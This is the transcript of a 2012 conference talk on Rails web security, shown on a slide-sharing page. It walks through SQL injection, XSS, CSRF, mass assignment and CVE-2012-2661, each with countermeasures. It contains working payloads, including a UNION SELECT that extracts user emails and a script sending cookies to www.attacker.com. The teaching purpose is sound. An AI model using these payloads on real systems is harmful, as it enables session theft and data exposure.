Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Application Security in Rails
Search
Uri Nativ
November 12, 2012
Programming
3
560
Web Application Security in Rails
#railsisrael 2012 lecture on web application security in rails
Uri Nativ
November 12, 2012
Tweet
Share
More Decks by Uri Nativ
See All by Uri Nativ
QA without QA
unativ
8
1.5k
Building an Awesome Engineering Culture
unativ
2
270
Pecha Kucha - Using Scrum Values to Build the Engineering Culture
unativ
0
290
Other Decks in Programming
See All in Programming
Performance for Conversion! 分散トレーシングでボトルネックを 特定せよ
inetand
0
120
Android端末で実現するオンデバイスLLM 2025
masayukisuda
1
120
Swift Updates - Learn Languages 2025
koher
2
470
複雑なドメインに挑む.pdf
yukisakai1225
5
1.1k
ユーザーも開発者も悩ませない TV アプリ開発 ~Compose の内部実装から学ぶフォーカス制御~
taked137
0
140
MCPとデザインシステムに立脚したデザインと実装の融合
yukukotani
4
1.4k
Introducing ReActionView: A new ActionView-compatible ERB Engine @ Rails World 2025, Amsterdam
marcoroth
0
630
Ruby×iOSアプリ開発 ~共に歩んだエコシステムの物語~
temoki
0
270
GitHubとGitLabとAWS CodePipelineでCI/CDを組み比べてみた
satoshi256kbyte
4
200
詳解!defer panic recover のしくみ / Understanding defer, panic, and recover
convto
0
230
Zendeskのチケットを Amazon Bedrockで 解析した
ryokosuge
3
290
Flutter with Dart MCP: All You Need - 박제창 2025 I/O Extended Busan
itsmedreamwalker
0
150
Featured
See All Featured
The Invisible Side of Design
smashingmag
301
51k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
48
9.7k
Six Lessons from altMBA
skipperchong
28
4k
Product Roadmaps are Hard
iamctodd
PRO
54
11k
Reflections from 52 weeks, 52 projects
jeffersonlam
352
21k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
234
17k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.5k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
7
840
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3.1k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Into the Great Unknown - MozCon
thekraken
40
2k
The Cult of Friendly URLs
andyhume
79
6.6k
Transcript
WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
Buy Now, Pay Later 1. Shop online 2. Receive your
goods 3. Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob Like Duh?
Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$
Alice and Bob Hack it!
SQL INJECTION
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’
WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection
- countermeasures
CROSS SITE SCRIPTING XSS
<span class="content"> <%= raw feed_item.content %> </span> XSS
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS
<span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>
XSS - countermeasures
The Attack: Execute arbitrary code / defacement JSON is not
escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS
CROSS SITE REQUEST FORGERY CSRF
www.blog.com CSRF 1
www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
3
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST
/blogpost Content=“Kick Me!” CSRF 4
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF –
Authenticity Token
routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF
class ApplicationController < ActionController::Base # commented to easily test forms
# protect_from_forgery ... end CSRF
The Attack: Attacker send requests on the victim’s behalf Doesn’t
depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT boo[gotcha!]
def create @user = User.new(params[:user]) ... end Mass Assignment
def create @user = User.new(params[:user]) ... end Mass Assignment {
:name => “gotcha”, :admin => true }
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass
Assignment - countermeasures
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation
... Mass Assignment - countermeasures
Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment -
countermeasures
The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong
Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.*
FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND
users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross
Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10 Follow Rails conventions
Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions
Daniel Amselem for pair programming Irit Shainzinger for the cool
graphics Michael Hartl for his microblogging app tutorial Thanks to…
Pay Online – Safer and Simpler https://github.com/unativ/sample_app